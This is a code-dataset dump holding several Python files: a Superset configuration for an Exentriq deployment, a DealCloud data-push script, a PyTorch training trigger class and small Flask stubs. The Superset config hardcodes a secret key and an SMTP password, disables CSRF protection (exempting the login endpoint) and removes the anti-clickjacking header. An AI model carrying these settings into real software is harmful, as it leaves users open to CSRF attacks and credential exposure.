hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a04bfc233dec377cd5cb3432a42d3e315ec495b
| 22,759
|
py
|
Python
|
extra/docker/latest/config/config.py
|
ExentriqLtd/exentriq-advanced-analytics
|
a7a45af97e8e7956bbf389bb952d625c69ddc626
|
[
"Apache-2.0",
"CC-BY-4.0",
"MIT"
] | null | null | null |
extra/docker/latest/config/config.py
|
ExentriqLtd/exentriq-advanced-analytics
|
a7a45af97e8e7956bbf389bb952d625c69ddc626
|
[
"Apache-2.0",
"CC-BY-4.0",
"MIT"
] | null | null | null |
extra/docker/latest/config/config.py
|
ExentriqLtd/exentriq-advanced-analytics
|
a7a45af97e8e7956bbf389bb952d625c69ddc626
|
[
"Apache-2.0",
"CC-BY-4.0",
"MIT"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=C,R,W
"""The main config file for Superset
All configuration in this file can be overridden by providing a superset_config
in your PYTHONPATH as there is a ``from superset_config import *``
at the end of this file.
"""
from collections import OrderedDict
import imp
import json
import os
import sys
from celery.schedules import crontab
from dateutil import tz
from flask_appbuilder.security.manager import AUTH_DB
from superset.stats_logger import DummyStatsLogger
from superset.exentriq import CustomSecurityManager
# Realtime stats logger, a StatsD implementation exists
STATS_LOGGER = DummyStatsLogger()
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
if 'SUPERSET_HOME' in os.environ:
DATA_DIR = os.environ['SUPERSET_HOME']
else:
DATA_DIR = os.path.join(os.path.expanduser('~'), '.superset')
# ---------------------------------------------------------
# Superset specific config
# ---------------------------------------------------------
PACKAGE_DIR = os.path.join(BASE_DIR, 'static', 'assets')
PACKAGE_FILE = os.path.join(PACKAGE_DIR, 'package.json')
with open(PACKAGE_FILE) as package_file:
VERSION_STRING = json.load(package_file)['version']
ROW_LIMIT = 50000
VIZ_ROW_LIMIT = 10000
# max rows retrieved by filter select auto complete
FILTER_SELECT_ROW_LIMIT = 10000
SUPERSET_WORKERS = 2 # deprecated
SUPERSET_CELERY_WORKERS = 32 # deprecated
SUPERSET_WEBSERVER_ADDRESS = '0.0.0.0'
SUPERSET_WEBSERVER_PORT = 8088
# This is an important setting, and should be lower than your
# [load balancer / proxy / envoy / kong / ...] timeout settings.
# You should also make sure to configure your WSGI server
# (gunicorn, nginx, apache, ...) timeout setting to be <= to this setting
SUPERSET_WEBSERVER_TIMEOUT = 60
SUPERSET_DASHBOARD_POSITION_DATA_LIMIT = 65535
EMAIL_NOTIFICATIONS = False
CUSTOM_SECURITY_MANAGER = CustomSecurityManager
SQLALCHEMY_TRACK_MODIFICATIONS = False
# ---------------------------------------------------------
# Your App secret key
SECRET_KEY = '\2\1thisismyscretkey\1\2\e\y\y\h' # noqa
# The SQLAlchemy connection string.
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(DATA_DIR, 'superset.db')
# SQLALCHEMY_DATABASE_URI = 'mysql://myapp@localhost/myapp'
# SQLALCHEMY_DATABASE_URI = 'postgresql://root:password@localhost/myapp'
# In order to hook up a custom password store for all SQLACHEMY connections
# implement a function that takes a single argument of type 'sqla.engine.url',
# returns a password and set SQLALCHEMY_CUSTOM_PASSWORD_STORE.
#
# e.g.:
# def lookup_password(url):
# return 'secret'
# SQLALCHEMY_CUSTOM_PASSWORD_STORE = lookup_password
# The limit of queries fetched for query search
QUERY_SEARCH_LIMIT = 1000
# Flask-WTF flag for CSRF
WTF_CSRF_ENABLED = False
# Add endpoints that need to be exempt from CSRF protection
WTF_CSRF_EXEMPT_LIST = ['superset.views.core.log', 'superset.views.api.login', 'superset.views.api.dashboards']
# Whether to run the web server in debug mode or not
DEBUG = os.environ.get('FLASK_ENV') == 'development'
FLASK_USE_RELOAD = True
# Whether to show the stacktrace on 500 error
SHOW_STACKTRACE = True
# Extract and use X-Forwarded-For/X-Forwarded-Proto headers?
ENABLE_PROXY_FIX = False
# ------------------------------
# GLOBALS FOR APP Builder
# ------------------------------
# Uncomment to setup Your App name
APP_NAME = 'Superset'
# Uncomment to setup an App icon
APP_ICON = '/static/assets/images/superset-logo@2x.png'
APP_ICON_WIDTH = 126
# Uncomment to specify where clicking the logo would take the user
# e.g. setting it to '/welcome' would take the user to '/superset/welcome'
LOGO_TARGET_PATH = None
# Druid query timezone
# tz.tzutc() : Using utc timezone
# tz.tzlocal() : Using local timezone
# tz.gettz('Asia/Shanghai') : Using the time zone with specific name
# [TimeZone List]
# See: https://en.wikipedia.org/wiki/List_of_tz_database_time_zones
# other tz can be overridden by providing a local_config
DRUID_IS_ACTIVE = True
DRUID_TZ = tz.tzutc()
DRUID_ANALYSIS_TYPES = ['cardinality']
# ----------------------------------------------------
# AUTHENTICATION CONFIG
# ----------------------------------------------------
# The authentication type
# AUTH_OID : Is for OpenID
# AUTH_DB : Is for database (username/password()
# AUTH_LDAP : Is for LDAP
# AUTH_REMOTE_USER : Is for using REMOTE_USER from web server
AUTH_TYPE = AUTH_DB
# Uncomment to setup Full admin role name
# AUTH_ROLE_ADMIN = 'Admin'
# Uncomment to setup Public role name, no authentication needed
# AUTH_ROLE_PUBLIC = 'Public'
# Will allow user self registration
# AUTH_USER_REGISTRATION = True
# The default user self registration role
# AUTH_USER_REGISTRATION_ROLE = "Public"
# When using LDAP Auth, setup the ldap server
# AUTH_LDAP_SERVER = "ldap://ldapserver.new"
# Uncomment to setup OpenID providers example for OpenID authentication
# OPENID_PROVIDERS = [
# { 'name': 'Yahoo', 'url': 'https://open.login.yahoo.com/' },
# { 'name': 'Flickr', 'url': 'https://www.flickr.com/<username>' },
# ---------------------------------------------------
# Roles config
# ---------------------------------------------------
# Grant public role the same set of permissions as for the GAMMA role.
# This is useful if one wants to enable anonymous users to view
# dashboards. Explicit grant on specific datasets is still required.
PUBLIC_ROLE_LIKE_GAMMA = False
# ---------------------------------------------------
# Babel config for translations
# ---------------------------------------------------
# Setup default language
BABEL_DEFAULT_LOCALE = 'en'
# Your application default translation path
BABEL_DEFAULT_FOLDER = 'superset/translations'
# The allowed translation for you app
LANGUAGES = {
'en': {'flag': 'us', 'name': 'English'},
'it': {'flag': 'it', 'name': 'Italian'},
'fr': {'flag': 'fr', 'name': 'French'},
'zh': {'flag': 'cn', 'name': 'Chinese'},
'ja': {'flag': 'jp', 'name': 'Japanese'},
'de': {'flag': 'de', 'name': 'German'},
'pt': {'flag': 'pt', 'name': 'Portuguese'},
'pt_BR': {'flag': 'br', 'name': 'Brazilian Portuguese'},
'ru': {'flag': 'ru', 'name': 'Russian'},
'ko': {'flag': 'kr', 'name': 'Korean'},
}
# ---------------------------------------------------
# Feature flags
# ---------------------------------------------------
# Feature flags that are set by default go here. Their values can be
# overwritten by those specified under FEATURE_FLAGS in super_config.py
# For example, DEFAULT_FEATURE_FLAGS = { 'FOO': True, 'BAR': False } here
# and FEATURE_FLAGS = { 'BAR': True, 'BAZ': True } in superset_config.py
# will result in combined feature flags of { 'FOO': True, 'BAR': True, 'BAZ': True }
DEFAULT_FEATURE_FLAGS = {
# Experimental feature introducing a client (browser) cache
'CLIENT_CACHE': False,
}
# A function that receives a dict of all feature flags
# (DEFAULT_FEATURE_FLAGS merged with FEATURE_FLAGS)
# can alter it, and returns a similar dict. Note the dict of feature
# flags passed to the function is a deepcopy of the dict in the config,
# and can therefore be mutated without side-effect
#
# GET_FEATURE_FLAGS_FUNC can be used to implement progressive rollouts,
# role-based features, or a full on A/B testing framework.
#
# from flask import g, request
# def GET_FEATURE_FLAGS_FUNC(feature_flags_dict):
# feature_flags_dict['some_feature'] = g.user and g.user.id == 5
# return feature_flags_dict
GET_FEATURE_FLAGS_FUNC = None
# ---------------------------------------------------
# Image and file configuration
# ---------------------------------------------------
# The file upload folder, when using models with files
UPLOAD_FOLDER = BASE_DIR + '/app/static/uploads/'
# The image upload folder, when using models with images
IMG_UPLOAD_FOLDER = BASE_DIR + '/app/static/uploads/'
# The image upload url, when using models with images
IMG_UPLOAD_URL = '/static/uploads/'
# Setup image size default is (300, 200, True)
# IMG_SIZE = (300, 200, True)
CACHE_DEFAULT_TIMEOUT = 60 * 60 * 24
CACHE_CONFIG = {'CACHE_TYPE': 'null'}
TABLE_NAMES_CACHE_CONFIG = {'CACHE_TYPE': 'null'}
# CORS Options
ENABLE_CORS = True
CORS_OPTIONS = {}
# Chrome allows up to 6 open connections per domain at a time. When there are more
# than 6 slices in dashboard, a lot of time fetch requests are queued up and wait for
# next available socket. PR #5039 is trying to allow domain sharding for Superset,
# and this feature will be enabled by configuration only (by default Superset
# doesn't allow cross-domain request).
SUPERSET_WEBSERVER_DOMAINS = None
# Allowed format types for upload on Database view
# TODO: Add processing of other spreadsheet formats (xls, xlsx etc)
ALLOWED_EXTENSIONS = set(['csv'])
# CSV Options: key/value pairs that will be passed as argument to DataFrame.to_csv method
# note: index option should not be overridden
CSV_EXPORT = {
'encoding': 'utf-8',
}
# ---------------------------------------------------
# Time grain configurations
# ---------------------------------------------------
# List of time grains to disable in the application (see list of builtin
# time grains in superset/db_engine_specs.builtin_time_grains).
# For example: to disable 1 second time grain:
# TIME_GRAIN_BLACKLIST = ['PT1S']
TIME_GRAIN_BLACKLIST = []
# Additional time grains to be supported using similar definitions as in
# superset/db_engine_specs.builtin_time_grains.
# For example: To add a new 2 second time grain:
# TIME_GRAIN_ADDONS = {'PT2S': '2 second'}
TIME_GRAIN_ADDONS = {}
# Implementation of additional time grains per engine.
# For example: To implement 2 second time grain on clickhouse engine:
# TIME_GRAIN_ADDON_FUNCTIONS = {
# 'clickhouse': {
# 'PT2S': 'toDateTime(intDiv(toUInt32(toDateTime({col})), 2)*2)'
# }
# }
TIME_GRAIN_ADDON_FUNCTIONS = {}
# ---------------------------------------------------
# List of viz_types not allowed in your environment
# For example: Blacklist pivot table and treemap:
# VIZ_TYPE_BLACKLIST = ['pivot_table', 'treemap']
# ---------------------------------------------------
VIZ_TYPE_BLACKLIST = []
# ---------------------------------------------------
# List of data sources not to be refreshed in druid cluster
# ---------------------------------------------------
DRUID_DATA_SOURCE_BLACKLIST = []
# --------------------------------------------------
# Modules, datasources and middleware to be registered
# --------------------------------------------------
DEFAULT_MODULE_DS_MAP = OrderedDict([
('superset.connectors.sqla.models', ['SqlaTable']),
('superset.connectors.druid.models', ['DruidDatasource']),
])
ADDITIONAL_MODULE_DS_MAP = {}
ADDITIONAL_MIDDLEWARE = []
"""
1) https://docs.python-guide.org/writing/logging/
2) https://docs.python.org/2/library/logging.config.html
"""
# Console Log Settings
LOG_FORMAT = '%(asctime)s:%(levelname)s:%(name)s:%(message)s'
LOG_LEVEL = 'DEBUG'
# ---------------------------------------------------
# Enable Time Rotate Log Handler
# ---------------------------------------------------
# LOG_LEVEL = DEBUG, INFO, WARNING, ERROR, CRITICAL
ENABLE_TIME_ROTATE = False
TIME_ROTATE_LOG_LEVEL = 'DEBUG'
FILENAME = os.path.join(DATA_DIR, 'superset.log')
ROLLOVER = 'midnight'
INTERVAL = 1
BACKUP_COUNT = 30
# Custom logger for auditing queries. This can be used to send ran queries to a
# structured immutable store for auditing purposes. The function is called for
# every query ran, in both SQL Lab and charts/dashboards.
# def QUERY_LOGGER(
# database,
# query,
# schema=None,
# user=None,
# client=None,
# security_manager=None,
# ):
# pass
# Set this API key to enable Mapbox visualizations
MAPBOX_API_KEY = os.environ.get('MAPBOX_API_KEY', '')
# Maximum number of rows returned from a database
# in async mode, no more than SQL_MAX_ROW will be returned and stored
# in the results backend. This also becomes the limit when exporting CSVs
SQL_MAX_ROW = 100000
# Default row limit for SQL Lab queries
DEFAULT_SQLLAB_LIMIT = 1000
# Maximum number of tables/views displayed in the dropdown window in SQL Lab.
MAX_TABLE_NAMES = 3000
# Adds a warning message on sqllab save query modal.
SQLLAB_SAVE_WARNING_MESSAGE = None
# If defined, shows this text in an alert-warning box in the navbar
# one example use case may be "STAGING" to make it clear that this is
# not the production version of the site.
WARNING_MSG = None
# Default celery config is to use SQLA as a broker, in a production setting
# you'll want to use a proper broker as specified here:
# http://docs.celeryproject.org/en/latest/getting-started/brokers/index.html
class CeleryConfig(object):
BROKER_URL = 'sqla+sqlite:///celerydb.sqlite'
CELERY_IMPORTS = (
'superset.sql_lab',
'superset.tasks',
)
CELERY_RESULT_BACKEND = 'db+sqlite:///celery_results.sqlite'
CELERYD_LOG_LEVEL = 'DEBUG'
CELERYD_PREFETCH_MULTIPLIER = 1
CELERY_ACKS_LATE = True
CELERY_ANNOTATIONS = {
'sql_lab.get_sql_results': {
'rate_limit': '100/s',
},
'email_reports.send': {
'rate_limit': '1/s',
'time_limit': 120,
'soft_time_limit': 150,
'ignore_result': True,
},
}
CELERYBEAT_SCHEDULE = {
'email_reports.schedule_hourly': {
'task': 'email_reports.schedule_hourly',
'schedule': crontab(minute=1, hour='*'),
},
}
CELERY_CONFIG = CeleryConfig
"""
# Set celery config to None to disable all the above configuration
CELERY_CONFIG = None
"""
# static http headers to be served by your Superset server.
# This header prevents iFrames from other domains and
# "clickjacking" as a result
# HTTP_HEADERS = {'X-Frame-Options': 'SAMEORIGIN'}
# If you need to allow iframes from other domains (and are
# aware of the risks), you can disable this header:
HTTP_HEADERS = {}
# The db id here results in selecting this one as a default in SQL Lab
DEFAULT_DB_ID = None
# Timeout duration for SQL Lab synchronous queries
SQLLAB_TIMEOUT = 30
# SQLLAB_DEFAULT_DBID
SQLLAB_DEFAULT_DBID = None
# The MAX duration (in seconds) a query can run for before being killed
# by celery.
SQLLAB_ASYNC_TIME_LIMIT_SEC = 60 * 60 * 6
# An instantiated derivative of werkzeug.contrib.cache.BaseCache
# if enabled, it can be used to store the results of long-running queries
# in SQL Lab by using the "Run Async" button/feature
RESULTS_BACKEND = None
# The S3 bucket where you want to store your external hive tables created
# from CSV files. For example, 'companyname-superset'
CSV_TO_HIVE_UPLOAD_S3_BUCKET = None
# The directory within the bucket specified above that will
# contain all the external tables
CSV_TO_HIVE_UPLOAD_DIRECTORY = 'EXTERNAL_HIVE_TABLES/'
# The namespace within hive where the tables created from
# uploading CSVs will be stored.
UPLOADED_CSV_HIVE_NAMESPACE = None
# A dictionary of items that gets merged into the Jinja context for
# SQL Lab. The existing context gets updated with this dictionary,
# meaning values for existing keys get overwritten by the content of this
# dictionary.
JINJA_CONTEXT_ADDONS = {}
# Roles that are controlled by the API / Superset and should not be changes
# by humans.
ROBOT_PERMISSION_ROLES = ['Public', 'Gamma', 'Alpha', 'Admin', 'sql_lab']
CONFIG_PATH_ENV_VAR = 'SUPERSET_CONFIG_PATH'
# If a callable is specified, it will be called at app startup while passing
# a reference to the Flask app. This can be used to alter the Flask app
# in whatever way.
# example: FLASK_APP_MUTATOR = lambda x: x.before_request = f
FLASK_APP_MUTATOR = None
# Set this to false if you don't want users to be able to request/grant
# datasource access requests from/to other users.
ENABLE_ACCESS_REQUEST = False
# smtp server configuration
EMAIL_NOTIFICATIONS = False # all the emails are sent using dryrun
SMTP_HOST = 'localhost'
SMTP_STARTTLS = True
SMTP_SSL = False
SMTP_USER = 'superset'
SMTP_PORT = 25
SMTP_PASSWORD = 'superset'
SMTP_MAIL_FROM = 'superset@superset.com'
if not CACHE_DEFAULT_TIMEOUT:
CACHE_DEFAULT_TIMEOUT = CACHE_CONFIG.get('CACHE_DEFAULT_TIMEOUT')
# Whether to bump the logging level to ERROR on the flask_appbuilder package
# Set to False if/when debugging FAB related issues like
# permission management
SILENCE_FAB = True
# The link to a page containing common errors and their resolutions
# It will be appended at the bottom of sql_lab errors.
TROUBLESHOOTING_LINK = ''
# CSRF token timeout, set to None for a token that never expires
WTF_CSRF_TIME_LIMIT = 60 * 60 * 24 * 7
# This link should lead to a page with instructions on how to gain access to a
# Datasource. It will be placed at the bottom of permissions errors.
PERMISSION_INSTRUCTIONS_LINK = ''
# Integrate external Blueprints to the app by passing them to your
# configuration. These blueprints will get integrated in the app
BLUEPRINTS = []
# Provide a callable that receives a tracking_url and returns another
# URL. This is used to translate internal Hadoop job tracker URL
# into a proxied one
TRACKING_URL_TRANSFORMER = lambda x: x # noqa: E731
# Interval between consecutive polls when using Hive Engine
HIVE_POLL_INTERVAL = 5
# Allow for javascript controls components
# this enables programmers to customize certain charts (like the
# geospatial ones) by inputing javascript in controls. This exposes
# an XSS security vulnerability
ENABLE_JAVASCRIPT_CONTROLS = False
# The id of a template dashboard that should be copied to every new user
DASHBOARD_TEMPLATE_ID = None
# A callable that allows altering the database conneciton URL and params
# on the fly, at runtime. This allows for things like impersonation or
# arbitrary logic. For instance you can wire different users to
# use different connection parameters, or pass their email address as the
# username. The function receives the connection uri object, connection
# params, the username, and returns the mutated uri and params objects.
# Example:
# def DB_CONNECTION_MUTATOR(uri, params, username, security_manager, source):
# user = security_manager.find_user(username=username)
# if user and user.email:
# uri.username = user.email
# return uri, params
#
# Note that the returned uri and params are passed directly to sqlalchemy's
# as such `create_engine(url, **params)`
DB_CONNECTION_MUTATOR = None
# A function that intercepts the SQL to be executed and can alter it.
# The use case is can be around adding some sort of comment header
# with information such as the username and worker node information
#
# def SQL_QUERY_MUTATOR(sql, username, security_manager):
# dttm = datetime.now().isoformat()
# return f"-- [SQL LAB] {username} {dttm}\n{sql}"
SQL_QUERY_MUTATOR = None
# When not using gunicorn, (nginx for instance), you may want to disable
# using flask-compress
ENABLE_FLASK_COMPRESS = True
# Enable / disable scheduled email reports
ENABLE_SCHEDULED_EMAIL_REPORTS = False
# If enabled, certail features are run in debug mode
# Current list:
# * Emails are sent using dry-run mode (logging only)
SCHEDULED_EMAIL_DEBUG_MODE = False
# Email reports - minimum time resolution (in minutes) for the crontab
EMAIL_REPORTS_CRON_RESOLUTION = 15
# Email report configuration
# From address in emails
EMAIL_REPORT_FROM_ADDRESS = 'reports@superset.org'
# Send bcc of all reports to this address. Set to None to disable.
# This is useful for maintaining an audit trail of all email deliveries.
EMAIL_REPORT_BCC_ADDRESS = None
# User credentials to use for generating reports
# This user should have permissions to browse all the dashboards and
# slices.
# TODO: In the future, login as the owner of the item to generate reports
EMAIL_REPORTS_USER = 'admin'
EMAIL_REPORTS_SUBJECT_PREFIX = '[Report] '
# The webdriver to use for generating reports. Use one of the following
# firefox
# Requires: geckodriver and firefox installations
# Limitations: can be buggy at times
# chrome:
# Requires: headless chrome
# Limitations: unable to generate screenshots of elements
EMAIL_REPORTS_WEBDRIVER = 'firefox'
# Window size - this will impact the rendering of the data
WEBDRIVER_WINDOW = {
'dashboard': (1600, 2000),
'slice': (3000, 1200),
}
# Any config options to be passed as-is to the webdriver
WEBDRIVER_CONFIGURATION = {}
# The base URL to query for accessing the user interface
WEBDRIVER_BASEURL = 'http://0.0.0.0:8080/'
# Send user to a link where they can report bugs
BUG_REPORT_URL = None
# Send user to a link where they can read more about Superset
DOCUMENTATION_URL = None
# What is the Last N days relative in the time selector to:
# 'today' means it is midnight (00:00:00) of today in the local timezone
# 'now' means it is relative to the query issue time
DEFAULT_RELATIVE_END_TIME = 'today'
# Is epoch_s/epoch_ms datetime format supposed to be considered since UTC ?
# If not, it is sassumed then the epoch_s/epoch_ms is seconds since 1/1/1970
# localtime (in the tz where the superset webserver is running)
IS_EPOCH_S_TRULY_UTC = False
EXENRIQ_SSO_URL = 'https://www.exentriq.com/JSON-RPC'
SESSION_COOKIE_SAMESITE = 'None'
SESSION_COOKIE_SECURE = True
try:
if CONFIG_PATH_ENV_VAR in os.environ:
# Explicitly import config module that is not in pythonpath; useful
# for case where app is being executed via pex.
print('Loaded your LOCAL configuration at [{}]'.format(
os.environ[CONFIG_PATH_ENV_VAR]))
module = sys.modules[__name__]
override_conf = imp.load_source(
'superset_config',
os.environ[CONFIG_PATH_ENV_VAR])
for key in dir(override_conf):
if key.isupper():
setattr(module, key, getattr(override_conf, key))
else:
from superset_config import * # noqa
import superset_config
print('Loaded your LOCAL configuration at [{}]'.format(
superset_config.__file__))
except ImportError:
pass
| 35.616588
| 111
| 0.70214
|
4a04c10ca743bb743230745a8023932677429bbc
| 2,443
|
py
|
Python
|
examples/push_value_update.py
|
c0gnac/dealcloud-python
|
ee27603e262eb49415fb2620b680a970ee3728a9
|
[
"BSD-3-Clause"
] | 1
|
2020-04-17T08:28:58.000Z
|
2020-04-17T08:28:58.000Z
|
examples/push_value_update.py
|
c0gnac/dealcloud-python
|
ee27603e262eb49415fb2620b680a970ee3728a9
|
[
"BSD-3-Clause"
] | 3
|
2020-04-17T13:26:55.000Z
|
2021-03-31T19:33:49.000Z
|
examples/push_value_update.py
|
jholtio/dealcloud-python
|
995d5a4066441120d2e8f4612ea4c20b658df123
|
[
"BSD-3-Clause"
] | 2
|
2020-04-17T12:53:23.000Z
|
2021-02-27T00:09:39.000Z
|
"""
This script pushes a new value to the EBITDA field for the "Project Genome"
entry on the Deal list
"""
import getpass as gp
import sys
import requests
import zeep
from zeep import xsd
import dealcloud as dc
# Create an instance of a client for the DealCloud Data Service and a service
# proxy
try:
client = dc.create_client(
email=input('Email: '), password=gp.getpass(),
hostname=input('Hostname: ')
)
except requests.exceptions.ConnectionError:
print('Failed to connect to the DealCloud Web Service.')
sys.exit()
service = dc.bind_service(client)
# Find all of the lists in the site and try to find the Deal list by name
lists = service.GetEntryLists()
try:
deal_list = list(filter(lambda l: l.Name == 'Deal', lists))[0]
except IndexError:
print('Deal list could not be found.')
sys.exit()
# Find all of the entries on the Deal list and try to find the 'Project Genome'
# entry by name
entries = service.GetListEntries(deal_list.Id)
try:
deal_entry = list(filter(lambda e: e.Name == 'Project Genome', entries))[0]
except IndexError:
print('Project Genome could not be found.')
sys.exit()
# Find all of the fields on all of the lists in a site, get the EBITDA field on
# the Deal list
fields = service.GetFields()
try:
deal_field = list(filter(
lambda f: f.EntryListId == deal_list.Id and f.Name == 'EBITDA',
fields
))[0]
except IndexError:
print('Fields could not be found.')
sys.exit()
# Create a type factory to access the types provided by the service
factory = client.type_factory('ns0')
# Build the payload for your request and push it
requests = factory.ArrayOfDCPush()
value = xsd.AnyObject(xsd.Decimal(), 1.9)
p = factory.DCPush(EntryId=deal_entry.Id, FieldId=deal_field.Id, Value=value)
requests.DCPush.append(p)
try:
responses = service.ProcessDCPush(
entryListId=deal_list.Id, requests=requests
)
except zeep.exceptions.Fault:
print('An error occurred with the server.')
sys.exit()
# Check your responses for any errors and print messages appropriately
for r in responses:
if r.Error is None:
print(f'Field {r.FieldId} of Entry {r.EntryId} updated successfully.')
else:
print(f'Error occurred for Field {r.FieldId} of Entry {r.EntryId}.')
print(f'Message: {r.Error.Description}')
| 28.406977
| 80
| 0.678264
|
4a04c3b0db032d5fcb57fe0dec6eb6916e0e5589
| 65
|
py
|
Python
|
duendecat.py
|
patarapolw/duen-gui
|
8ad04b4346419d9bfe3cfd6fdad49ca50030d56b
|
[
"MIT"
] | 3
|
2019-03-18T18:34:34.000Z
|
2021-09-09T07:47:59.000Z
|
duendecat.py
|
patarapolw/duen-gui
|
8ad04b4346419d9bfe3cfd6fdad49ca50030d56b
|
[
"MIT"
] | null | null | null |
duendecat.py
|
patarapolw/duen-gui
|
8ad04b4346419d9bfe3cfd6fdad49ca50030d56b
|
[
"MIT"
] | null | null | null |
import duendecat
if __name__ == '__main__':
duendecat.gui()
| 13
| 26
| 0.692308
|
4a04c3f4c75301cfa2eafd4c7370ebeb54170976
| 3,755
|
py
|
Python
|
pytorch_pfn_extras/training/triggers/interval_trigger.py
|
yasuyuky/pytorch-pfn-extras
|
febea6ded644d3b7a099ac557f06567a04b3b838
|
[
"MIT"
] | null | null | null |
pytorch_pfn_extras/training/triggers/interval_trigger.py
|
yasuyuky/pytorch-pfn-extras
|
febea6ded644d3b7a099ac557f06567a04b3b838
|
[
"MIT"
] | null | null | null |
pytorch_pfn_extras/training/triggers/interval_trigger.py
|
yasuyuky/pytorch-pfn-extras
|
febea6ded644d3b7a099ac557f06567a04b3b838
|
[
"MIT"
] | null | null | null |
from pytorch_pfn_extras.training import trigger
class IntervalTrigger(trigger.Trigger):
"""Trigger based on a fixed interval.
This trigger accepts iterations divided by a given interval. There are two
ways to specify the interval: per iterations and epochs. `Iteration` means
the number of updates, while `epoch` means the number of sweeps over the
training dataset. Fractional values are allowed if the interval is a
number of epochs; the trigger uses the `iteration` and `epoch_detail`
attributes defined by the manager.
For the description of triggers see
:func:`~pytorch_pfn_extras.get_trigger`.
Args:
period (int or float): Length of the interval. Must be an integer if
unit is ``'iteration'``.
unit (str): Unit of the length specified by ``period``. It must be
either ``'iteration'`` or ``'epoch'``.
"""
def __init__(self, period, unit):
if unit not in ('epoch', 'iteration'):
raise ValueError(
'Trigger unit must be either \'epoch\' or \'iteration\'.')
self.period = period
self.unit = unit
self._previous_iteration = 0
self._previous_epoch_detail = 0.
# count is kept for backward compatibility
self.count = 0
def __call__(self, manager):
"""Decides whether the extension should be called on this iteration.
Args:
manager (~pytorch_pfn_extras.training.ExtensionsManager):
Manager object that this trigger is associated with.
The iteration related information in this manager is used to
determine if the trigger should fire.
Returns:
bool: True if the corresponding extension should be invoked in this
iteration.
"""
if self.unit == 'epoch':
epoch_detail = manager.epoch_detail
previous_epoch_detail = self._previous_epoch_detail
# if previous_epoch_detail is invalid value,
# use the value of manager.
if previous_epoch_detail < 0:
previous_epoch_detail = manager.previous_epoch_detail
# count is kept for backward compatibility
self.count = epoch_detail // self.period
fire = previous_epoch_detail // self.period != \
epoch_detail // self.period
else:
iteration = manager.iteration
previous_iteration = self._previous_iteration
# if previous_iteration is invalid value,
# guess it from current iteration.
if previous_iteration < 0:
previous_iteration = iteration - 1
fire = previous_iteration // self.period != \
iteration // self.period
# save current values
self._previous_iteration = manager.iteration
if hasattr(manager, 'epoch_detail'):
self._previous_epoch_detail = manager.epoch_detail
return fire
def state_dict(self):
state = {}
state['_previous_iteration'] = self._previous_iteration
state['_previous_epoch_detail'] = self._previous_epoch_detail
return state
def load_state_dict(self, to_load):
self._previous_iteration = to_load['_previous_iteration']
self._previous_epoch_detail = to_load['_previous_epoch_detail']
def get_training_length(self):
return (self.period, self.unit)
def __str__(self):
"""Returns a string describing the class and interval
Returns:
str: IntervalTrigger(<period>, '<unit>')
"""
return '{}({}, \'{}\')'.format(
self.__class__.__name__, self.period, self.unit
)
| 34.449541
| 79
| 0.628495
|
4a04c50914cd621e0dd2d3c7118a67d1abdc1195
| 177
|
py
|
Python
|
app/__init__.py
|
sythe100/maintenance-minder
|
f6c1494f6f8108ac206ba32bd2cd7c9bf85e9bbd
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
sythe100/maintenance-minder
|
f6c1494f6f8108ac206ba32bd2cd7c9bf85e9bbd
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
sythe100/maintenance-minder
|
f6c1494f6f8108ac206ba32bd2cd7c9bf85e9bbd
|
[
"MIT"
] | null | null | null |
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config.from_object('config')
db = SQLAlchemy(app)
from app import views, models
| 17.7
| 43
| 0.785311
|
4a04c57033fb6f6435f86a0c86aa55290b4a06c8
| 1,320
|
py
|
Python
|
helium/auth/views/apis/usersettingsviews.py
|
HeliumEdu/platform
|
54b82a40c21fd14d1b7f37d5f2afb51eea2f8cf5
|
[
"MIT"
] | 15
|
2018-01-02T00:44:58.000Z
|
2022-03-19T21:38:29.000Z
|
helium/auth/views/apis/usersettingsviews.py
|
HeliumEdu/platform
|
54b82a40c21fd14d1b7f37d5f2afb51eea2f8cf5
|
[
"MIT"
] | 327
|
2017-11-24T22:36:07.000Z
|
2022-02-10T08:09:08.000Z
|
helium/auth/views/apis/usersettingsviews.py
|
HeliumEdu/platform
|
54b82a40c21fd14d1b7f37d5f2afb51eea2f8cf5
|
[
"MIT"
] | 3
|
2018-05-04T17:57:58.000Z
|
2021-11-18T13:58:46.000Z
|
import logging
from django.contrib.auth import get_user_model
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from helium.auth.serializers.usersettingsserializer import UserSettingsSerializer
